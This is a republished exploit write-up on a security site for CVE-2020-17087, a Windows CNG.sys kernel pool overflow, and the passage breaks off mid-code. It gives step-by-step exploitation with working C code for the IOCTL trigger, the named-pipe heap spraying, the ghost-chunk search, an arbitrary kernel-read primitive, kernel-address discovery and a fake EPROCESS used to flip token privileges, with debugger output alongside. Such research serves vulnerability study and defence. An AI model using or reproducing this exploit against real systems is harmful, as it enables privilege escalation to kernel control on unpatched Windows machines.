标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-2959] 作者: 大猪 发表于: [2021-12-10]
本文共 [707] 位读者顶过
CVE-2020-17087: Exploiting the CNG.sys IOCTL 0x390400 Pool Overflow Vulnerability[出自:jiwo.org]OverviewCVE-2020-17087 is a pool overflow vulnerability in Windows CNG.sys driver that was discovered to be exploited in the wild [1]. Although there have been root-cause analyses of the vulnerability, its exploitation technique is still relatively unknown. The most notable information was the disclosure by Google Project Zero (GP0) that the ITW sample "uses the buffer overflow to establish an arbitrary read / write primitive in the kernel space with the help of Named Pipe objects" [2]. In this blog post, we describe how this vulnerability could be exploited based on the BlockSize attack method of the Windows 10 Segment Heap [5]. This exploit was developed on Windows 10 20H2, and tested from 1903 to 20H2. Technical DetailsAs described in the GP0 issue tracker [1], the root cause can be found in the function cng!CfgAdtpFormatProeprtyBlock, where the requested buffer is transformed to a space-separated hex representation in Unicode, hence the requested size SrcLen is multiplied by 6 to obtain the output buffer size. However, the size fed into cng!BCryptAlloc is incorrectly truncated to 16-bit. When srcLen exceeds 0x10000 / 6, the allocation would result in a smaller buffer and subsequently overflown during the string translation. Notes on Windows 10 Segment Heap Pool OverflowBefore we start, it is worthwhile to highlight these relevant Segment Heap information [3][4], exploitation techniques [5][6][7] and our notes. If you are familiar, feel free to jump to the next section. Segment Heap front end: The NonPagedPoolNx allocations are from nt!ExAllocatePoolWithTag by calling the ntoskrnl internal function nt!ExAllocateHeapPool, which then calls respective front-end allocation routines depending on the size requested, either through LFH or VS Allocation, if the requests can be satisfied. For larger blocks it will go to Block Allocation via nt!RtlpHpLargeAlloc. When there is not enough in the Front End allocator, a new Subsegment is requested by calling nt!RtlpHpSegAlloc to the Backend Allocator. Low Fragmentation Heap (LFH) is for frequently used chunk sizes less than 0x200 bytes, they are allocated via RtlpHpLfhContextAllocate from a LFH Subsegment; Variable Size (VS) allocations are for chunks of size in [0x200, 0xFE0] and (0xFE0, 0x20000] that are not page aligned (size & 0xFFF != 0) and they are allocated via RtlpHpVsContextAllocateInternal from a VS Subsegment. In general, LFH involves smaller chunks and is catering frequently used chunk sizes across the entire kernel, so it is more challenging to control and do layout. With constraints from the vulnerability and attack methods available, we choose to use VS allocator for the exploit. Guard Pages: During experimenting the pool layout, we have encountered inaccessible pages around every 0x10 pages. But the vulnerability request at least a 64KB "runway" to complete the overflow. This at first makes exploitation looks impossible. As from [4], "When VS subsegments, LFH subsegments and large blocks are allocated, a guard page is added at the end of the subsegment / block. For VS and LFH subsegments, the subsegment size should be >= 64KB for a guard page to be added. The guard page prevents a sequential overflow from VS blocks, LFH blocks and large blocks from corrupting adjacent data outside the subsegment (for VS / LFH blocks) or outside the block (for large blocks)". After more careful reading and experiments, we've found that the subsegment size can actually range from 64KB to 256KB, as also noted in [5]. By reversing relevant functions in ntoskrnl like nt!RtlpHpSegAlloc and nt!RtlpHpVsSubsegmentCreate, we find the only possible size is 128KB (0x20000) for this exploit to work. For example, by requesting a VS chunk of size around 11 pages (0xae70), we can get a new subsegment with 23 pages (92KB) of usable space. Pool Header attacks: The CTF challenges [6][7] are designed to use a planted vulnerability which normally has better characteristics, and it turns out they are not close to this particular bug. The two attacks described in the SSTIC paper [5] are however quite close, namely, the PoolType attack (CacheAligned) and the BlockSize attack. Due to the unique overwriting pattern of this bug being "XX 00 XX 00 20 00", only the BlockSize byte can be controlled to a few limited values as this byte is on an even address and the odd bytes are not controllable: Breakpoint 0 hit cng!CfgAdtpFormatPropertyBlock+0x4e: fffff803`3fd524aa e83549faff call cng!BCryptAlloc (fffff803`3fcf6de4) 1: kd> dt nt!_POOL_HEADER rax-10 +0x000 PreviousSize : 0y00000000 (0) +0x000 PoolIndex : 0y00000000 (0) +0x002 BlockSize : 0y00110111 (0x37) ; 0x37 << 4 = 0x370 bytes +0x002 PoolType : 0y00000010 (0x2) ; NonPagedPoolMustSucceed +0x000 Ulong1 : 0x2370000 +0x004 PoolTag : 0x62676e43 ; "Cngb" +0x008 ProcessBilled : 0xffff9d88`074b3b49 _EPROCESS +0x008 AllocatorBackTraceIndex : 0x3b49 +0x00a PoolTagHash : 0x74b Dynamic Lookaside: "Freed chunk of size between 0x200 and 0xF80 bytes can be temporarily stored in a lookaside list in order to provide fast allocation. While they are in the lookaside these chunks won't go through their respective backend free mechanism." A neat technique is described in the SSTIC paper [5] on enabling the dynamic lookaside for a particular VS chunk sizes. This is a crucial part of the BlockSize attack and the PoolType attack. In short, the provided algorithm is able to tweak the Balance Set Manager and the dynamic lookaside, such that the most used chunk sizes since last rebalance are enabled. This would allow reliable free and reallocation of the same chunk, even when this chunk has a corrupted VS chunk header, as the chunk only goes to the dynamic lookaside temporarily (i.e., not really freed by the backend, hence avoiding a BSOD). In this exploit, this would enable us to convert the limited pool overflow into a controlled pool overflow using a size-changed "ghost chunk"; searching for the corrupted chunk by repeatedly freeing and allocating back chunks from an array; and implementing an arbitrary decrement primitive with the Quota Process Pointer Overwrite attack. Named Pipe spray: For NonPagedPoolNx allocations, Named Pipe is a well-documented technique to spray controlled data, it can also be used to build arbitrary read primitive. We can create a pair of Named Pipe handles for read and write with CreatePipe, which would create an _NP_CCB and an _NP_FCB object, they are linked to the Named Pipe FileObject from the process handle table and are linked to DataQueue object of _NP_DATA_QUEUE. An _NP_DATA_QUEUE_ENTRY object is allocated and place into the DataQueue when data is written to the Named Pipe write handle with WriteFile. The _NP_DATA_QUEUE_ENTRY object has a 0x30 bytes header and additional buffered data, which can be fully controlled (it's referred to as struct PipeQueueEntry in [3]). The exact working mechanism can be referenced with the ReactOS source on npfs and reverse engineering of relevant functions in npfs.sys. The key relevant functions are NpAddDataQueueEntry, NpRemoveDataQueueEntry, NpPeek, NpInternalRead etc. There are two main use of _NP_DATA_QUEUE_ENTRY objects in this exploit. By overwriting both fields _NP_DATA_QUEUE_ENTRY.{QuotaInEntry, DataSize} to larger values, we can read out-of-bound using PeekNamedPipe to leak the DataQueue pointer of the next DQE object. Secondly, by writing the leaked DataQueue pointer to the next block (we need a valid queue pointer to avoid a BSOD), and changing the DataEntryType from 0 (Buffered) to 1 (Unbuffered), we can change the DQE object to Unbuffered mode, which uses the Irp pointer as the data source. By pointing Irp to a user-mode fake _IRP structure, we can reset the AssociatedIrp.SystemBuffer pointer in user-mode before each read request, thereby we can build an arbitrary read primitive. struct _NP_DATA_QUEUE_ENTRY { // Let's call this DQE for short +0x00 LIST_ENTRY QueueEntry; +0x10 PIRP Irp; // For Unbuffered and AAR primitive +0x18 PSECURITY_CLIENT_CONTEXT ClientSecurityContext; +0x20 ULONG DataEntryType; // Buffered 0, Unbuffered 1 +0x24 ULONG QuotaInEntry; // Overwrite to get AAR +0x28 ULONG DataSize; // Overwrite to get AAR }; struct _NP_DATA_QUEUE { LIST_ENTRY Queue; // points back to _NP_DATA_QUEUE_ENTRY ULONG QueueState; // 1 (WriteEntries) ULONG BytesInQueue; ULONG EntriesInQueue; ULONG QuotaUsed; ULONG ByteOffset; ULONG Quota; }; struct _NP_CCB; // Named Pipe Client Control Block struct _NP_FCB; // Named Pipe File Control Block Quota Process Pointer Overwrite: When a chunk has PoolQuota bit (0x8) set in _POOL_HEADER.PoolType, the ProcessBilled field is linked to the _EPROCESS structure of the owning process. Allocation and free of chunks with quota statistics lead to increments or decrements in the EPROCESS_QUOTA_BLOCK pointed to by _EPROCESS.QuotaBlock. Once we gained the ability to overwrite the ProcessBilled field we can craft an arbitrary decrement primitive with a crafted QuotaBlock pointer. Note that due to changes across the builds of Windows 10 the data structures may have changed over time, and this method could have side effects depending on the field values in the process Token. The method requires an arbitrary read to leak the chunk address and the nt!ExpPoolQuotaCookie value in order to encode a _EPROCESS pointer which has a crafted QuotaBlock pointer that points near to the Token.Privileges field. Exploitation ConditionsDuring exploiting the vulnerability, we note that there are some unique conditions that makes the exploitation different from the typical pool overflows:
While (1) and (2) gives some flexibility in the potential range of objects we can overwrite, and the possible layout we can have, (3) in fact makes the exploitation quite challenging, because both the content and offset to overwrite become quite restrictive. This limits the choices of layout, objects and attack method for the 1903-20H2 Segment Heap. Exploitation StrategyThe steps of exploitation on Windows 10 x64 20H1 is briefly outlined below. We use the following terms, 'g' for groups, the large chunk pattern of the spray; 'd' for dummy, the assisting allocations in order to form groups; target chunks are for the expected chunk to be overwritten; hole chunks are positioned so that the vulnerable CNG.sys buffer gets allocated into the layout; fill chunks are used to stabilize the hole chunks.
1. Spray groupsDue to the unique requirement of the vulnerability, there are more than 64KB written to the CNG output buffer. And due to the properties of Segment Heap, normally each VS Subsegment is no more than 64KB and is guarded by an inaccessible page before and after the subsegment. The idea is to request a sufficiently large VS request so that more than 64KB is allocated. Additionally we want the allocations to be in two big groups (g2 and g3), so that the hole chunks are in the first group and the target chunks are in the second group. Ideally each of the two groups should be 0x10 pages each, so that no matter which hole is occupied by the CNG buffer, the resulted overflow is guaranteed to overwrite one target chunk at a desired offset, yet not hitting the guard page out-of-bound. ; Windows 10 20H1 19041.572 .text:00000001C00624A7 movzx ecx, di ; NumberOfBytes .text:00000001C00624AA call BCryptAlloc ; truncated .text:00000001C00624AF mov rdx, rax bu /p ffff9c833549f080 !cng + 624AA PAGE:00000001C000D571 mov edx, edx ; NumberOfBytes PAGE:00000001C000D573 mov ecx, 308h ; PoolType PAGE:00000001C000D578 mov r8d, 7246704Eh ; Tag 'NpFr' PAGE:00000001C000D57E call cs:__imp_ExAllocatePoolWithQuotaTag PAGE:00000001C000D585 nop dword ptr [rax+rax+00h] bu /p ffff9c833549f080 !npfs + D58A ".printf \"[+] Allocated %x bytes DataEntry at %p\\n\",r13, rax; g" .text:00000001402C7C36 call RtlpHpVsSubsegmentCreate .text:00000001402C7C3B mov rsi, rax bu /p ffff9c833549f080 !nt + 2C7C3B ".printf \"[+] RtlpHpVsSubsegmentCreate(req=%x): alloc %p size %x \\n\",r13,rax,poi(rax+20)&0xffff; g" The idea is to allocate two d1 VS chunks of close to 11 pages, this would result in a 23 pages new subsegment; then free the two d1 chunks and request for a 12 pages d2 chunk and 10 pages d2 chunk. This will ensure the order that d2 would be at the start of the subsegment. [+] RtlpHpVsSubsegmentCreate(req=ae70): alloc ffff8d8f57fc5000 size 1ffd [+] Allocated ae40 bytes DataEntry at ffff8d8f57fc6000 [+] Allocated ae40 bytes DataEntry at ffff8d8f57fd1000 [+] RtlpHpVsSubsegmentCreate(req=be70): alloc ffff8d8f57fc5000 size 1ffd [+] Allocated be40 bytes DataEntry at ffff8d8f57fc6000 [+] Allocated 9e30 bytes DataEntry at ffff8d8f57fd2000 As far as the current analysis goes, we can not create subsegment larger than 128KB yet. Relevant code for allocating subsegment larger than 64KB: void __fastcall ExAllocateHeapPool(unsigned int PoolType, SIZE_T NumberOfBytes, ULONG Tag, ULONG_PTR BugCheckParameter2, char a5) { // ... // RtlpHpLargeAlloc() for larger than 0x20000 if ( _size > 0x20000 ) { JUMPOUT(_size, *(unsigned int *)(v16 + 464), sub_1404675B9); v78 = RtlpHpLargeAlloc(v16, _size, _size, v54); v56 = v78; } else { // Use VsContext for <= 0x20000 a6 = 0; v98 = 0i64; *(_OWORD *)a5a = 0i64; // One of system 0x20000 goes through here, when reqested 0x9070 v56 = (__int64)RtlpHpVsContextAllocateInternal(// goes to VsContext allocator! (_HEAP_VS_CONTEXT *)(v16 + 0x280), _size, v55, v54, (__int64)a5a, &a6); // ... } // ... } The final layout of the 23 pages subsegment looks like follows: [guard][g3,1P][------- g1, 10P --------][----- free space of 12P -----][guard] 2. Spray target chunksThis step is to fill the 12 pages of free space after g1 with target chunks. target_pipes = prepare_pipe(0x3D0, spray_cnt * 12 * 4 / 10, 'T', 20); spray(target_pipes); On each of the 12 pages, 4 target chunks will be allocated, and aligned at similar offsets, with their chunk _POOL_HEADER starting at 0x000, 0x3F0, 0x7E0, 0xBD0 respectively. We are expecting the ghost chunk to be at 0x7E0 of a page, and the target chunk T following it at 0xBD0. As illustrated below: ffffd20a`a3f797d0 9e15ce1a de4a7ff9 0000000e ffffd20a ......J......... ffffd20a`a3f797e0 0a3e9f00 7246704e 6cbebe8c 0e5b280c ..>.NpFr...l.([. ffffd20a`a3f797f0 9092a4b8 ffff870e 9092a4b8 ffff870e ................ ffffd20a`a3f79800 00000000 00000000 909cfa00 ffff870e ................ ffffd20a`a3f79810 00000000 000003a0 000003a0 44444444 ............DDDD ffffd20a`a3f79820 54545454 54545454 54545454 54545454 TTTTTTTTTTTTTTTT ffffd20a`a3f79bc0 9e15c20a de4a7ff9 0000001e ffffd20a ......J......... ffffd20a`a3f79bd0 0a3e9f00 7246704e 6cbeb2bc 0e5b280c ..>.NpFr...l.([. ffffd20a`a3f79be0 9092a878 ffff870e 9092a878 ffff870e x.......x....... ffffd20a`a3f79bf0 00000000 00000000 909cfdc0 ffff870e ................ ffffd20a`a3f79c00 00000000 000003a0 000003a0 44444444 ............DDDD ffffd20a`a3f79c10 54545454 54545454 54545454 54545454 TTTTTTTTTTTTTTTT 3. Create holesNow we can free all the g1 chunks to get continuous free space of 10 pages. And allocate hole chunks (0x7F0 bytes). As each page can not hold two hole chunks, they are expected to be allocated to the start of the each page in each free page. After allocating all hole checks, allocate fill chunks (0x7B0 bytes) to occupy the free space after each hole chunk. Finally we free one hole for every 0x10 allocations to get roughly one hole per subsegment, for the last 2/3 of the subsegments created. hole_pipes = prepare_pipe(0x800 - 0x40, spray_cnt, 'H', 0); // 0x7f0 chunk fill_pipes = prepare_pipe(0x7D0 - 0x40, spray_cnt, 'F', 0); // 0x7b0 chunk close_all_pipe_from_idx(g1_pipes, 0); spray(hole_pipes); spray(fill_pipes); create_holes_from(hole_pipes, spray_cnt / 3); From this spray layout, we expect each hole chunk to start at the beginning of a page. 4. Trigger the vulnerability in CNGNow we are ready to trigger the vulnerability and the CNG output buffer is expected to fall into one of the holes just created. CONST DWORD DataBufferSize = 0x2BF9; // overwrites 0x2BF9 * 6 = 0x107D6 bytes, till 0x107E6 CONST DWORD IoctlSize = 4096 + DataBufferSize; BYTE *IoctlData = (BYTE *)HeapAlloc(GetProcessHeap(), 0, IoctlSize); RtlZeroMemory(IoctlData, IoctlSize); *(DWORD*) &IoctlData[0x00] = 0x1A2B3C4D; *(DWORD*) &IoctlData[0x04] = 0x10400; *(DWORD*) &IoctlData[0x08] = 1; *(ULONGLONG*)&IoctlData[0x10] = 0x100; *(DWORD*) &IoctlData[0x18] = 3; *(ULONGLONG*)&IoctlData[0x20] = 0x200; *(ULONGLONG*)&IoctlData[0x28] = 0x300; *(ULONGLONG*)&IoctlData[0x30] = 0x400; *(DWORD*) &IoctlData[0x38] = 0; *(ULONGLONG*)&IoctlData[0x40] = 0x500; *(ULONGLONG*)&IoctlData[0x48] = 0x600; *(DWORD*) &IoctlData[0x50] = DataBufferSize; // OVERFLOW *(ULONGLONG*)&IoctlData[0x58] = 0x1000; *(ULONGLONG*)&IoctlData[0x60] = 0; RtlCopyMemory(&IoctlData[0x200], L"FUNCTION", 0x12); RtlCopyMemory(&IoctlData[0x400], L"PROPERTY", 0x12); memset(IoctlData + 0x1000 + DataBufferSize - 0x2, '\xdd', 0x2); // write 0x64 as BS ULONG_PTR OutputBuffer = 0; DWORD BytesReturned; BOOL Status = DeviceIoControl( hCng, 0x390400, IoctlData, IoctlSize, &OutputBuffer, sizeof(OutputBuffer), &BytesReturned, NULL ); After the overwrite, one of the target chunks at the desired offset gets overwritten with 6 bytes at 0x7E6: 1: kd> gu cng!CfgAdtReportFunctionPropertyOperation+0x22d: fffff803`65351e39 85c0 test eax,eax 1: kd> dc ffffd20a`a3f797d0 ffffd20a`a3f797d0 00200030 00300030 00640020 00200064 0. .0.0. .d.d. . ffffd20a`a3f797e0 00640064 72460020 6cbebe8c 0e5b280c d.d. .Fr...l.([. ffffd20a`a3f797f0 9092a4b8 ffff870e 9092a4b8 ffff870e ................ ffffd20a`a3f79800 00000000 00000000 909cfa00 ffff870e ................ ffffd20a`a3f79810 00000000 000003a0 000003a0 44444444 ............DDDD ffffd20a`a3f79820 54545454 54545454 54545454 54545454 TTTTTTTTTTTTTTTT ffffd20a`a3f79830 54545454 54545454 54545454 54545454 TTTTTTTTTTTTTTTT ffffd20a`a3f79840 54545454 54545454 54545454 54545454 TTTTTTTTTTTTTTTT The chunk has its BlockSize overwritten to 0x64, from previous 0x3E. The other 5 neighboring bytes overwritten are either unused or do not matter. We refer this chunk as the ghost chunk since its size increased to overlap the next target chunk T: ffffd20a`a3f79bc0 9e15c20a de4a7ff9 0000001e ffffd20a ......J......... ffffd20a`a3f79bd0 0a3e9f00 7246704e 6cbeb2bc 0e5b280c ..>.NpFr...l.([. ffffd20a`a3f79be0 9092a878 ffff870e 9092a878 ffff870e x.......x....... ffffd20a`a3f79bf0 00000000 00000000 909cfdc0 ffff870e ................ ffffd20a`a3f79c00 00000000 000003a0 000003a0 44444444 ............DDDD ffffd20a`a3f79c10 54545454 54545454 54545454 54545454 TTTTTTTTTTTTTTTT By freeing the ghost chunk and allocating it back again, we can write 0x640 - 0x3E0 = 0x260 bytes of arbitrary data into the target chunk T. Effectively converting the single byte overwrite on BlockSize into a controlled linear pool overflow. And this primitive can be invoked repeatedly, allowing us to build more powerful primitives. 5. Locate the ghost chunkAssuming the later sprayed target chunks are sequentially allocated, we can search backwards on the target chunk handles to locate the ghost chunk. The idea is to free one target chunk with its handle, then allocate it back immediately, followed by a test on the adjacent target chunk on whether a linear pool overflow has taken place. By searching backwards, we ensure if a freed target chunk is not the ghost, it gets allocated back immediately. lookaside_t *ghost_lookaside = prepare_lookaside(0x640); lookaside_t *target_lookaside = prepare_lookaside(0x3E0); enable_lookaside(2, ghost_lookaside, target_lookaside); With the help of the dynamic lookaside list, the freed ghost chunk (BlockSize 0x64) will not go back to the normal free mechanism, avoiding a BSOD as its VS chunk header is corrupted: 1: kd> dc ffffd20a`a3f797d0 ffffd20a`a3f797d0 00200030 00300030 00640020 00200064 0. .0.0. .d.d. . // VS header ffffd20a`a3f797e0 00640064 72460020 6cbebe8c 0e5b280c d.d. .Fr...l.([. Note we can not search sequentially forward because there are around 64KB corrupted chunks between the CNG buffer and the ghost chunk, accidentally freeing any of them would result in immediate BSOD. We construct the ghost chunk payload as follow, note the root queue pointers are invalid. We need to stop the search as soon as the target chunk T is found, as freeing a DQE object with invalid root queue leads to immediate BSOD. // craft ghost chunk data in ghost_pipes->payload *(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x00) = 0xdeadbeef;// leak_root_queue *(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x08) = 0xdeadbeef;// leak_root_queue *(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x10) = 0xdeadbeef;// Irp *(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x18) = 0;// Security Context *(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x20) = 0;// Type: Unbuffered *(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x24) = 0xFFFFFFFF;// QuotaInEntry *(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x28) = 0xFFFFFFFF;// DataSize *(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x30) = 0x67676767;// Buf[]: "gggg" We can now start the searching: _LOG(output, "[*] Searching for overwritten target chunk\n"); for (ghost_idx = target_pipes->cnt - 2; ghost_idx >= 0; ghost_idx --) { BYTE buf[0x10] = { 0 }; create_hole_at(target_pipes, ghost_idx); // free DataEntry T[i] fill_hole_at(ghost_pipes, ghost_idx); // alloc ghost chunk peek_data(target_pipes, ghost_idx + 1, buf, 8); if ( *(UINT32*)buf == 0x67676767 ) { // found "gggg" aar_index = ghost_idx + 1; aar_pipes = target_pipes; _LOG(output, "[+] Target chunk at: index 0x%X, handle 0x%llX\n", aar_index, (UINT64)target_pipes->writePipe[aar_index]); break; } fill_hole_at(target_pipes, ghost_idx); // refill T[i] } 6. Leak a valid root queue pointerWhen the ghost chunk is found, the adjacent target chunk T is overwritten with control data, including the DataSize and QuotaInEntry being modified to 0xFFFFFFFF. As already used when testing the overwrite in the searching in previous step, we can leak a large number of data with PeekNamedPipe. Reading past the end of the target chunk T to next page, we can get a valid root queue pointer. BYTE leak[0x480] = { 0 }; if ( !peek_data(target_pipes, aar_index, leak, sizeof(leak)) ) exp_failed(); if (*(UINT32*)(leak + 0x430 - 0x8) != 0x3A0) { _LOG(output, "[-] Failed to locate next target chunk of size 0x3a0\n"); exp_failed(); } leak_root_queue = *(UINT64*)(leak + 0x430 - 0x30); target_pool_hdr = *(UINT64*)(leak + 0x430 - 0x30 - 0x10); _LOG(output, "[+] Leaked Queue Ptr at\t: 0x%p\n", leak_root_queue); 7. Build an AAR primitiveWe can now invoke the controlled linear pool overflow again by freeing the ghost chunk and allocating it back, this time we can set the root queue pointer to the valid pointer just leaked, meanwhile we set the IRP pointer to a crafted IRP object in the user space, and set the DataEntryType to 1 (Unbuffered). The updated target chunk T can now be used as an arbitrary address read (AAR) primitive. typedef struct pipe_queue_entry_sub { UINT64 unk; UINT64 unk1; UINT64 unk2; UINT64 data_ptr; // AssociatedIrp.SystemBuffer } pipe_queue_entry_sub_t; pipe_queue_entry_sub_t * fake_pipe_queue_sub; fake_pipe_queue_sub = (pipe_queue_entry_sub_t *)malloc(sizeof(pipe_queue_entry_sub_t)); memset(fake_pipe_queue_sub, 0, sizeof(pipe_queue_entry_sub_t)); // update the ghost chunk, fix _POOL_HEADER *(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x00)= leak_root_queue; // QE.Flink *(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x08)= leak_root_queue; // QE.Blink *(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x10)= (UINT64) fake_pipe_queue_sub; *(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x20)= 1; // Bufferred *(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x10)=target_pool_hdr; *(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x08)=0; // Clear ProcessBilled *(UINT8*) (ghost_pipes->payload+0x3F0-0x30-0x10+0x3)=0x2; // Clear Quota bit *(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x30)=0x6b61656c; // Buf[]: "leak" create_hole_at(ghost_pipes, ghost_idx); // free ghost chunk fill_hole_at(ghost_pipes, ghost_idx); // rewrite ghost chunk "GGG0" current_pipe_offset = 0; We can now use these two functions to perform AAR of 4/8 or more bytes: void arb_read_bytes(UINT64 where, int size, BYTE* readbuf) { fake_pipe_queue_sub->data_ptr = where; peek_data(aar_pipes, aar_index, readbuf, size); current_pipe_offset += size; } UINT64 arb_read(UINT64 where, int size) { BYTE readbuf[0x100] = { 0 }; fake_pipe_queue_sub->data_ptr = where; peek_data(aar_pipes, aar_index, readbuf, size); current_pipe_offset += size; return size > 4 ? *(UINT64*)readbuf : *(UINT32*)readbuf; } 8. Leak pointers and variablesWith the AAR, we have the leaked root queue pointer as a starting point, we can leak the pointers and variables needed in this exploit. This step references the work and sample code in [3], and requires some reversing into the actual data structures on _NP_CCB (Named Pipe Client Control Block) and _NP_FCB (Named Pipe File Control Block). From the leaked root queue pointer, we can find linked file object, subsequently the device object and the driver object. From the driver object pointer we can get the function pointer NpFsdCreate. Though still depending on the exact version of NPFS.sys, this offset is relatively stable across a build of Windows 10, we can derive the base address !npfs. In the final version we use backward search of the PE header from the pointer NpFsdCreate by calling get_pe_base. By trial-and-error, we've found two ntoskrnl functions that are imported by npfs, which has direct references to the variables and pointer we need for ntoskrnl. We use find_nt_variables to extract their actual address in memory. This is a generic method as ntoskrnl has many different binary releases from 1903 to 20H2. By parsing the binary from the import functions ExFreePoolWithTag and ExAllocatePoolWithQuotaTag, we can derive the addresses of nt!RtlpHpHeapGlobals, which is referenced when encoding / decoding the _HEAP_VS_CHUNK_HEADER, nt!ExpPoolQuotaCookie, which is later used to encode the ProcessBilled pointer in _POOL_HEADER, nt!PsInitialSystemProcess, which is needed to traverse the active processes to find self process and winlogon.exe _EPROCESS pointers. The search is implemented by find_address(UINT64 start, BYTE* opcode, BYTE* before, BYTE* after) with the start address to search, the opcode patterns before and after the address to search. As the memory management code are relatively stable across different ntoskrnl binaries, this is expect to work as generic for Windows 10. The algorithm may need adjustments when testing a different build that fails at this step. /* PsInitialSystemProcess - npfs imported ExAllocatePoolWithQuotaTag+0x36 * ExpPoolQuotaCookie - npfs imported ExAllocatePoolWithQuotaTag+0x90 * RtlpHpHeapGlobals - npfs imported ExFreeHeapPool+{0xC2,0xBD}: {20Hx,190x} */ BOOL find_nt_variables(UINT64 npfs_base_addr) { UINT64 ExAllocatePoolWithQuotaTag, ExFreePoolWithTag, ExFreeHeapPool; UINT64 ExAllocatePoolWithQuotaTag_ptr, ExFreePoolWithTag_ptr; ExFreePoolWithTag_ptr = npfs_base_addr + off_Npfs_ExFreePoolWithTag; ExAllocatePoolWithQuotaTag_ptr = npfs_base_addr + off_Npfs_ExAllocatePoolWithQuotaTag; ExAllocatePoolWithQuotaTag = arb_read(ExAllocatePoolWithQuotaTag_ptr, 0x8); ExFreePoolWithTag = arb_read(ExFreePoolWithTag_ptr, 0x8); /* 48 83 EC 28 sub rsp, 28h E8 97 7A CD FF call ExFreeHeapPool 48 83 C4 28 add rsp, 28h */ ExFreeHeapPool = find_address(ExFreePoolWithTag, "\xE8", "\x48\x83\xEC\x28", "\x48\x83\xC4\x28"); /* 48 8D 04 49 lea rax, [rcx+rcx*2] 48 33 1D BC 1B 3F 00 xor rbx, cs:RtlpHpHeapGlobals 48 33 DF xor rbx, rdi 48 C1 E0 06 shl rax, 6 */ RtlpHpHeapGlobals_ptr = find_address(ExFreeHeapPool + 0xBD - 0x10, "\x48\x33\x1D", "\x48\x8D\x04\x49", "\x48\x33\xDF\x48"); /* 44 0F 44 C9 cmovz r9d, ecx 48 3B 3D D3 EF A3 00 cmp rdi, cs:PsInitialSystemProcess 41 8D 69 08 lea ebp, [r9+8] */ PsInitialSystemProcess_ptr = find_address(ExAllocatePoolWithQuotaTag + 0x32 - 0x10, "\x48\x3B\x3D", "\x44\x0F\x44\xC9", "\x41\x8D\x69\x08"); /* 49 8D 5F F0 lea rbx, [r15-10h] 48 8B 15 29 F5 A3 00 mov rdx, cs:ExpPoolQuotaCookie 45 33 C0 xor r8d, r8d 48 8B C2 mov rax, rdx */ ExpPoolQuotaCookie_ptr = find_address(ExAllocatePoolWithQuotaTag + 0x8C - 0x10, "\x48\x8B\x15", "\x49\x8D\x5F\xF0", "\x45\x33\xC0\x48"); return (RtlpHpHeapGlobals_ptr && PsInitialSystemProcess_ptr && ExpPoolQuotaCookie_ptr); } Additionally we also need to find the _EPROCESS pointer for the self process and winlogon.exe. Since we already obtained nt!PsInitialSystemProcess, it is a well-documented process to obtain the process structures and the Token address. 9. Prepare for arbitrary decrementsWhen the PoolQuota flag is set in the _POOL_HEADER of a VS chunk, the ProcessBilled is set to an encoded _EPROCESS pointer, which is used to track the allocation and free statistics of the associated chunk. The QuotaBlock is not well-documented and seems being updated across different Windows builds. Reversing of the relevant functions and trial-and-error are required. 0: kd> dt nt!_EPROCESS 0xffffc50d9fc1d030 QuotaBlock +0x568 QuotaBlock : 0xffffb203`c294e0a8 _EPROCESS_QUOTA_BLOCK When a chunk is freed, the QuotaEntry of the relevant PsQuotaTypes is modified. The arbitrary decrement is based the subtraction in nt!PspReturnQuota called from nt!ExFreeHeapPool: we can subtract the chunk size off the QuotaEntry[PsNonPagedPool].Usage. Therefore, by crafting a _EPROCESS structure with the QuotaBlock pointer pointing to a specific offset to certain positions in the Token, we can subtract the chunk size from a QWORD in _TOKEN.Privileges, effectively flipping some bits in the Present and Enabled fields. __int64 __fastcall ExFreeHeapPool(ULONG_PTR BugCheckParameter2) { // ... if ( ChunkAddr & 0xFFF ) // not page aligned { OriginalHeader = ChunkAddr - 16; if ( *(_BYTE *)(ChunkAddr - 13) & 4 ) // test PoolType & CacheAligned { OriginalHeader -= 16i64 * (unsigned __int8)*(_WORD *)OriginalHeader; *(_BYTE *)(OriginalHeader + 3) |= 4u; } _PoolType = *(unsigned __int8 *)(OriginalHeader + 3); _Tag = *(_DWORD *)(OriginalHeader + 4); if ( _PoolType & 8 ) // PoolQuota flag: ProcessBilled { Process = (_BYTE *)(OriginalHeader ^ ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8)); if ( OriginalHeader != (ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8)) ) { JUMPOUT(Process, 0xFFFF800000000000i64, &BugCheck_C2_466E46); JUMPOUT(*Process & 0x7F, 3, &BugCheck_C2_466E46); if ( Process != (_BYTE *)PsInitialSystemProcess ) { PspReturnQuota( *(char **)((OriginalHeader ^ ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8)) + 0x568), (_EPROCESS *)(OriginalHeader ^ ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8)), _PoolType & 1, 16i64 * (unsigned __int8)*(_WORD *)(OriginalHeader + 2)); Tag = *(unsigned int *)(OriginalHeader + 4); } ObDereferenceObjectDeferDeleteWithTag((ULONG_PTR)Process);// EPROCESS } } // ... } In this exploit, the PsPoolTypes happens to be 0 (PsNonPagedPool), and the Usage field is at offset 0 of each EPROCESS_QUOTA_ENTRY, we just set the QuotaBlock pointer to the location of the LSB to decrement: // note the fake _EPROCESS starts at offset 0x70 of each buffer void setup_fake_eprocess(UINT64 token_addr) { char fake_eproc_buf[0x3000] = { 0 }; copySelfEprocess(fake_eproc_buf, self_eprocess); memcpy(fake_eproc_buf+0x1000, fake_eprocess_buf, FAKE_EPROCESS_SIZE); #ifdef _WINDLL memcpy(fake_eproc_buf+0x2000, 